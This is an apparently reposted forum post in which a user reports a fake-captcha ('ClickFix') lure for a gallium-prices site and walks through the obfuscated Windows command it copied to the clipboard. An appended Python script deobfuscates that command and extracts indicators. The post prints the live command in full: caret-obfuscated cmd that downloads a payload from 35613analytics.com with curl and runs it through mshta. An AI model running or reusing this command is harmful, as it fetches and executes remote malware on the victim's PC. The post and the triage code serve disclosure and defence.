Found a possibly interesting live attack

So I was looking for gallium prices and I clicked the 6th link on the first page on Google. Really damn long link that's supposed to go to https://strategicmetalsinvest.com/gallium-prices/. And I'm met with a captcha; obviously after I click, it says further verification is needed and gives me instructions that boil down to: open Run, paste something, and hit Enter. I know about this particular vector so I don't follow those instructions and instead open up a new plain text file to see what exactly it threw in my clipboard, and it's the following command (please do not run this unless you know what you are doing):

%COMSPEC% /c s^t^a^r^t "" /min %COMSPEC% /c "(for /f "delims=" %E in ('echo %LocalAppData%\Voter.pdf') do ^c^u^r^l^ -skLo "%E" 35613analytics.com/uuu && ^m^s^h^t^a^ "%E")"

So my interest is piqued and I start googling to find out what all of this does. COMSPEC opens up cmd.exe, and the /c flag is meant to close the cmd window right after the command is run. The carets (^) obfuscating "start" are apparently invisible to the terminal, so all it sees is "start", which opens another cmd.exe in a minimized state, presumably to keep the user unaware. At this point I assume the first cmd.exe would terminate and the minimized second one would continue the attack. There's another /c to terminate the new cmd after it's done. Then there's an interesting block of code that wasn't obvious to me, so I'll run through my thought process.

A few things stood out to me: %LocalAppData%\Voter.pdf, curl, and mshta. I checked the Local App Data folder to see if there's possibly some program that stores, like, keys or passwords at the specified file name, and there's nothing there. I know curl is a download command, so it must pull some payload from the 35613analytics site and then do something with it. I google mshta and it's a command to run HTA files (HTML application?), which I didn't even know existed. I get to this point and I'm stumped because I know very little about hacking and even less about Microsoft terminal magic, so I turn to ChatGPT.

ChatGPT tells me the inner (for /f ...) part sets a variable %E to %LocalAppData%\Voter.pdf and then feeds that to the curl command along with a few flags and the 35613analytics address, which outputs the Voter.pdf file at the LocalAppData location, and then feeds that file address to mshta, which (quoting from ChatGPT) "Even though the file is named .pdf, mshta will treat it as executable script if it contains HTA/JavaScript".

I found that fascinating because that seems like a horrible way to design a utility, but also I heard about that Adobe PDF and JavaScript exploit where attackers get arbitrary code execution from someone opening a bad PDF in an at-risk PDF reader, so I thought this might be interesting to you guys. I checked VirusTotal, ANY.RUN, and Joe Sandbox to see if the website or filename were flagged as malicious but got no results, so I think this post might be the first or one of the first reports on this particular live attack. I'm also curious as to what's in the payload, but I have no way of safely downloading and examining it and I sure as hell am not gonna run any fragment of that command. So if anyone has the capabilities to safely examine the payload, I'd love to know what horrible things it would have done to my Win 10 PC. Oh, BTW, I checked the website out and the main page is just blank with "OK" output on it in plaintext, and the /uuu subdomain is just a white page with no HTML at all. Also sorry if this is the wrong subreddit or format for this; I wasn't sure where else to post.

submitted by /u/_K0T
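As an added example (this is not code from the post or from anyone in the thread): a small Python triage script that does offline what the poster worked out by hand. It undoes the caret escaping, resolves the for /f "echo" trick that hides the drop path in a loop variable, pulls out the download URL, the drop path and the binary that runs it, and flags the ClickFix traits the post describes (caret obfuscation, start /min, nested cmd, download-then-execute, and mshta being handed a file that is not a .hta). The input is the exact clipboard string from the post, embedded as a test string; the indicator names and the list of abused binaries are my own choices, not anything from the page.

```python
import json
import re

# The exact clipboard contents from the post, embedded here only as input for
# this script. Do NOT paste it into Run.
CLIPBOARD_CMD = r'''%COMSPEC% /c s^t^a^r^t "" /min %COMSPEC% /c "(for /f "delims=" %E in ('echo %LocalAppData%\Voter.pdf') do ^c^u^r^l^ -skLo "%E" 35613analytics.com/uuu && ^m^s^h^t^a^ "%E")"'''

# Binaries commonly abused as the second-stage executor in ClickFix-style
# lures (my own list, assumption for this example).
LOLBINS = ('mshta', 'rundll32', 'regsvr32', 'wscript', 'cscript',
           'powershell', 'pwsh', 'msiexec', 'certutil', 'bitsadmin')


def decaret(s: str) -> str:
    """Undo cmd.exe caret escaping: '^x' -> 'x', '^^' -> '^'.

    cmd.exe only honours carets outside double quotes. This pass ignores
    quote state on purpose: at the first cmd layer the carets sit inside the
    outer "(...)" and are passed through literally, then the second
    'cmd /c "..."' strips that outer quote pair before parsing, so the
    effective command is the fully de-careted one.
    """
    out, i = [], 0
    while i < len(s):
        if s[i] == '^' and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def _tokens(s: str):
    # Quoted strings stay whole; everything else splits on whitespace.
    return re.findall(r'"[^"]*"|\S+', s)


def _parse_curl(tokens):
    """Return (url, output_path) from a curl token list. A single-dash option
    cluster ending in 'o' (e.g. -skLo) or --output consumes the next token."""
    url, out, i = None, None, 1
    while i < len(tokens):
        t = tokens[i]
        takes_file = t == '--output' or (
            t.startswith('-') and not t.startswith('--') and t.endswith('o'))
        if takes_file and i + 1 < len(tokens):
            out = tokens[i + 1].strip('"')
            i += 2
            continue
        if not t.startswith('-') and url is None:
            url = t.strip('"')
        i += 1
    return url, out


def analyze(raw: str) -> dict:
    """Triage a suspected ClickFix command: deobfuscate and extract IOCs."""
    deobf = decaret(raw)

    # for /f ... %X in ('echo <value>') do ...  -> remember %X = <value>
    subst = {}
    m = re.search(r'for\s+/f\s+(?:"[^"]*"\s+)?%(\w+)\s+in\s+\(\'echo\s+([^\']+)\'\)',
                  deobf, re.I)
    if m:
        subst['%' + m.group(1)] = m.group(2)

    def resolve(tok: str) -> str:
        tok = tok.strip('"')
        for var, val in subst.items():
            tok = tok.replace(var, val)
        return tok

    download_url = drop_path = executor = exec_arg = None
    for seg in re.split(r'\s*(?:&&|\|\|)\s*', deobf):
        c = re.search(r'\bcurl\b', seg, re.I)
        if c and download_url is None:
            download_url, out = _parse_curl(_tokens(seg[c.start():]))
            drop_path = resolve(out) if out else None
        for name in LOLBINS:
            e = re.search(r'\b' + name + r'(?:\.exe)?\b', seg, re.I)
            if e and executor is None:
                toks = _tokens(seg[e.start():])
                executor = name
                exec_arg = resolve(toks[1]) if len(toks) > 1 else None

    indicators = []
    if '^' in raw:
        indicators.append('caret_obfuscation')
    if re.search(r'\bstart\b.*?/min', deobf, re.I):
        indicators.append('start_min_hidden_window')
    if len(re.findall(r'%comspec%|\bcmd(?:\.exe)?\b', deobf, re.I)) >= 2:
        indicators.append('nested_cmd')
    if download_url and executor and drop_path and exec_arg == drop_path:
        indicators.append('download_then_execute')
    if executor == 'mshta' and exec_arg and not exec_arg.lower().endswith('.hta'):
        indicators.append('lolbin_extension_mismatch')

    return {'deobfuscated': deobf, 'download_url': download_url,
            'drop_path': drop_path, 'executor': executor,
            'executor_arg': exec_arg, 'indicators': indicators}


if __name__ == '__main__':
    print(json.dumps(analyze(CLIPBOARD_CMD), indent=2))
```

On the post's sample this resolves %E to %LocalAppData%\Voter.pdf, reports 35613analytics.com/uuu as the download source and mshta as the executor, and raises all five indicators. The same raw string contains none of "start", "curl" or "mshta" as substrings, which is exactly why naive keyword matching on clipboard or RunMRU contents misses this lure and why the decaret step has to come first.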

from hacking: security in practice https://ift.tt/ylpj90H
